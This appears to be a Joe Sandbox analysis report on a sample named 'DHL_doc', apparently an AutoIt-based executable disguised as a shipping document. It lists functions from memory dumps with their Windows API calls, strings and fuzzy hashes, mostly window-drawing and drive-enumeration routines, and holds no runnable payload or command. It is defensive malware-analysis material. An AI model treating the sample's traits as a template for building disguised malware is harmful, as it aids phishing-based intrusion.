Function 00EE7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2026fbc9c7ae01fb9fd2046277619b619d68556a1f4ba686bd55297440426312
Instruction ID: 2d3ccc09b15eacc0d305e173db9ba64b60d9981c9031c8d15a5f4aca9a124bcb
Opcode Fuzzy Hash: 2026fbc9c7ae01fb9fd2046277619b619d68556a1f4ba686bd55297440426312
Instruction Fuzzy Hash: E46168316087CD96DB34992B8995BFF73DADF41748F203929E8CAFB281D6119E428315

Function 00EE7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a840f263640d32dc8352e5cec260ffca929a1e68796ea5d691b708c6ae642d2
Instruction ID: 2bced42580bbd5d5f0a881a36df20400382eedd1fe9d5907a07838c8f7833f8d
Opcode Fuzzy Hash: 1a840f263640d32dc8352e5cec260ffca929a1e68796ea5d691b708c6ae642d2
Instruction Fuzzy Hash: C76178312087CD62DB388A2B5D91BFE23C99F43708F10395DE8C2FB291EA12AD428211

Function 00EE1706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 5f1afaec94aca19558dc81dce528c1316278247e57acf6a464596d53202418e2
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 578183726080E70ADB2D423B857447EFFE15A923A531A27DED4F2DA1C2EE3485D4E620

Function 024C3610 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 8f08a721efbe288cffcda7d5ab60ebda9050f57582c05a653e4c2cb0abb281f3
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 0241B571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB50

Function 00F32046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78561a0a4737c4fdcb4481a050950f7d9c63cd1a86eca8cdbb55a3a065832a9
Instruction ID: 9d2b9a0f9e4cc3c23d2567ab5cf7b1de652275d157e9ef3efc3b9fe736d8bace
Opcode Fuzzy Hash: c78561a0a4737c4fdcb4481a050950f7d9c63cd1a86eca8cdbb55a3a065832a9
Instruction Fuzzy Hash: 7521D5727216158BDB2CCF79C82267E73E5A754320F14862EE4A7C37D0DE39A904DB80

Function 024C3500 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 56f13d6054c46d6d4ab58e2731f65bdc1b3069a14a899c16f6f55f1f7242c580
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 4D019678A04109EFCB84DF98C5909AEFBB5FB48310F2085DAD819A7741D731AE41DB80

Function 024C34A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: e9b3cf183ddb2fc7e0533d98e480a3a3ba817ade61844ffaf2d8ae3da2684c3b
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: BB019678A04109EFCB84DF98C5909AEFBB5FB48310F2085DAD819A7701D731AE41DB84

Function 024C1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00F42ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F42B30
DeleteObject.GDI32(00000000), ref: 00F42B43
DestroyWindow.USER32 ref: 00F42B52
GetDesktopWindow.USER32 ref: 00F42B6D
GetWindowRect.USER32(00000000), ref: 00F42B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F42CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F42CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42CF8
GetClientRect.USER32(00000000,?), ref: 00F42D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F42D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42D80
GlobalLock.KERNEL32(00000000), ref: 00F42D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42D98
GlobalUnlock.KERNEL32(00000000), ref: 00F42DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42DA8
GlobalFree.KERNEL32(00000000), ref: 00F42DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00F5FC38,00000000), ref: 00F42DDB
GlobalFree.KERNEL32(00000000), ref: 00F42DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F42E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F42E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F42E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F4303F

Strings

, xrefs: 00F42FC5
DISPLAY, xrefs: 00F42EA2
AutoIt v3, xrefs: 00F42CF2
static, xrefs: 00F42D3A, 00F42E91

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 99fbbe1d9a549c763799d14849ea7069c13bfbb2bdf5e1e51e99ba93910c9ff1
Instruction ID: 3c754215363270813dd124fda249efe474c48756771af6de85a407b77cb66d19
Opcode Fuzzy Hash: 99fbbe1d9a549c763799d14849ea7069c13bfbb2bdf5e1e51e99ba93910c9ff1
Instruction Fuzzy Hash: D7025E71900209AFDB14DF64CD89EAE7BB9FB48711F048158F916AB2A1C775DD01DFA0

Function 00F570D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F5712F
GetSysColorBrush.USER32(0000000F), ref: 00F57160
GetSysColor.USER32(0000000F), ref: 00F5716C
SetBkColor.GDI32(?,000000FF), ref: 00F57186
SelectObject.GDI32(?,?), ref: 00F57195
InflateRect.USER32(?,000000FF,000000FF), ref: 00F571C0
GetSysColor.USER32(00000010), ref: 00F571C8
CreateSolidBrush.GDI32(00000000), ref: 00F571CF
FrameRect.USER32(?,?,00000000), ref: 00F571DE
DeleteObject.GDI32(00000000), ref: 00F571E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00F57230
FillRect.USER32(?,?,?), ref: 00F57262
GetWindowLongW.USER32(?,000000F0), ref: 00F57284

Part of subcall function 00F573E8: GetSysColor.USER32(00000012), ref: 00F57421
Part of subcall function 00F573E8: SetTextColor.GDI32(?,?), ref: 00F57425
Part of subcall function 00F573E8: GetSysColorBrush.USER32(0000000F), ref: 00F5743B
Part of subcall function 00F573E8: GetSysColor.USER32(0000000F), ref: 00F57446
Part of subcall function 00F573E8: GetSysColor.USER32(00000011), ref: 00F57463
Part of subcall function 00F573E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F57471
Part of subcall function 00F573E8: SelectObject.GDI32(?,00000000), ref: 00F57482
Part of subcall function 00F573E8: SetBkColor.GDI32(?,00000000), ref: 00F5748B
Part of subcall function 00F573E8: SelectObject.GDI32(?,?), ref: 00F57498
Part of subcall function 00F573E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00F574B7
Part of subcall function 00F573E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F574CE
Part of subcall function 00F573E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00F574DB

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: cf3ef0e1543a52adc152b283b8b4b0419ddd20a9ceea342ba20cc9364e86cbb2
Instruction ID: 0118a4fc52930d3c328ad63faf072410109320e1a44ebbb833f55df636afe650
Opcode Fuzzy Hash: cf3ef0e1543a52adc152b283b8b4b0419ddd20a9ceea342ba20cc9364e86cbb2
Instruction Fuzzy Hash: B5A19072408705AFD700AF60DC48A5B7BA9FB49332F140A19FB63961E1D770E944EB91

Function 00ED8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00ED8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F16AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F16AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F16F43

Part of subcall function 00ED8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED8BE8,?,00000000,?,?,?,?,00ED8BBA,00000000,?), ref: 00ED8FC5

SendMessageW.USER32(?,00001053), ref: 00F16F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F16F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F16FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00F16FB7

Strings

0, xrefs: 00F16DCF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: f33c6cda93ed61b48da515e2415ef555257046cd4dccb99568b398a4e6a88d7e
Instruction ID: e1002ba069b8614b6889ca451ad5d3ef6a334a75c6fd26a240a197319ac8f323
Opcode Fuzzy Hash: f33c6cda93ed61b48da515e2415ef555257046cd4dccb99568b398a4e6a88d7e
Instruction Fuzzy Hash: AC129C30A04206DFDB25CF14D984BEAB7E5FB44321F14456AE585DB2A1CB31E892EF91

Function 00F42711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F4273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F4286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00F428A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00F428B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00F42900
GetClientRect.USER32(00000000,?), ref: 00F4290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00F42955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F42964
GetStockObject.GDI32(00000011), ref: 00F42974
SelectObject.GDI32(00000000,00000000), ref: 00F42978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00F42988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F42991
DeleteDC.GDI32(00000000), ref: 00F4299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F429C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F429DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00F42A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F42A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F42A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00F42A77
GetStockObject.GDI32(00000011), ref: 00F42A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F42A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00F42A97

Strings

msctls_progress32, xrefs: 00F42A13
DISPLAY, xrefs: 00F4295A
AutoIt v3, xrefs: 00F428F8
static, xrefs: 00F4294F, 00F42A71

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 389053ea65c112ae87f4d61e44bdcb1d9cf9664ebc4e30fa2e3403bbd88fd865
Instruction ID: 5d765aac032d2139cfb9f8e5b51bf71ba05961e1326de972cdbf9bb86b71ead6
Opcode Fuzzy Hash: 389053ea65c112ae87f4d61e44bdcb1d9cf9664ebc4e30fa2e3403bbd88fd865
Instruction Fuzzy Hash: 85B14B71A00219AFEB14DF68DC8AFAE7BB9FB48711F004119FA15E7290D774AD40DB94

Function 00F34ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F34AED
GetDriveTypeW.KERNEL32(?,00F5CB68,?,\\.\,00F5CC08), ref: 00F34BCA
SetErrorMode.KERNEL32(00000000,00F5CB68,?,\\.\,00F5CC08), ref: 00F34D36

Strings

SSD, xrefs: 00F34C4A
1394, xrefs: 00F34C9F
Unknown, xrefs: 00F34BED, 00F34C83
FileBackedVirtual, xrefs: 00F34CEC
RAID, xrefs: 00F34CBB
Virtual, xrefs: 00F34CE5
SATA, xrefs: 00F34CD0
ATAPI, xrefs: 00F34C91
Fixed, xrefs: 00F34C09
Fibre, xrefs: 00F34CAD
SSA, xrefs: 00F34CA6
USB, xrefs: 00F34CB4
Removable, xrefs: 00F34C10, 00F34C15
PhysicalDrive, xrefs: 00F34B76
\\.\, xrefs: 00F34B3F
iSCSI, xrefs: 00F34CC2
CDROM, xrefs: 00F34BFB
ATA, xrefs: 00F34C98
MMC, xrefs: 00F34CDE
SCSI, xrefs: 00F34C8A
RAMDisk, xrefs: 00F34BF4
SAS, xrefs: 00F34CC9
Network, xrefs: 00F34C02

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 7f91c2563af53c7abc886badf7e59d8bf066ae37a8ca520a1c0b5a69e28012d3
Instruction ID: f53e3496c188c4bde92af552973bc54e0feada1d4db676e6da04f1083068056e
Opcode Fuzzy Hash: 7f91c2563af53c7abc886badf7e59d8bf066ae37a8ca520a1c0b5a69e28012d3
Instruction Fuzzy Hash: 306195326052059BCB04EF24CA81EADB7A1EB447A5F249415F806EB692DB36FD41FB42

Function 00F573E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F57421
SetTextColor.GDI32(?,?), ref: 00F57425
GetSysColorBrush.USER32(0000000F), ref: 00F5743B
GetSysColor.USER32(0000000F), ref: 00F57446
CreateSolidBrush.GDI32(?), ref: 00F5744B
GetSysColor.USER32(00000011), ref: 00F57463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F57471
SelectObject.GDI32(?,00000000), ref: 00F57482
SetBkColor.GDI32(?,00000000), ref: 00F5748B
SelectObject.GDI32(?,?), ref: 00F57498
InflateRect.USER32(?,000000FF,000000FF), ref: 00F574B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F574CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00F574DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F57554
InflateRect.USER32(?,000000FD,000000FD), ref: 00F57572
DrawFocusRect.USER32(?,?), ref: 00F5757D
GetSysColor.USER32(00000011), ref: 00F5758E
SetTextColor.GDI32(?,00000000), ref: 00F57596
DrawTextW.USER32(?,00F570F5,000000FF,?,00000000), ref: 00F575A8
SelectObject.GDI32(?,?), ref: 00F575BF
DeleteObject.GDI32(?), ref: 00F575CA
SelectObject.GDI32(?,?), ref: 00F575D0
DeleteObject.GDI32(?), ref: 00F575D5
SetTextColor.GDI32(?,?), ref: 00F575DB
SetBkColor.GDI32(?,?), ref: 00F575E5

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c89f71d6bda52da5e8b9afa73aba2f091659ab98787cd4aa43e3d9285b4e6bac
Instruction ID: e29289d1913d024afb1c82db53c874cf25bd526b46b024d20e0fb7daed258a44
Opcode Fuzzy Hash: c89f71d6bda52da5e8b9afa73aba2f091659ab98787cd4aa43e3d9285b4e6bac
Instruction Fuzzy Hash: 32616F72D00318AFDF019FA4DC49EAE7FB9EB08721F154115FA16AB2A1D7719940EF90

Function 00F50FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F51128
GetDesktopWindow.USER32 ref: 00F5113D
GetWindowRect.USER32(00000000), ref: 00F51144
GetWindowLongW.USER32(?,000000F0), ref: 00F51199
DestroyWindow.USER32(?), ref: 00F511B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F511ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F5120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F5121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00F51232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00F51245
IsWindowVisible.USER32(00000000), ref: 00F512A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00F512BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00F512D0
GetWindowRect.USER32(00000000,?), ref: 00F512E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00F5130E
GetMonitorInfoW.USER32(00000000,?), ref: 00F51328
CopyRect.USER32(?,?), ref: 00F5133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00F513AA

Strings

tooltips_class32, xrefs: 00F511E6
(, xrefs: 00F5131B
0, xrefs: 00F510D3

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: dbb563c1a0d3e6382d91960fedb2378aa650cea5d7f26b1e76c4697acf8be0fd
Instruction ID: ec9f8b670be8c9d433a6d4ddb52903950f3cecf5d23dd545f6eac43ddd305197
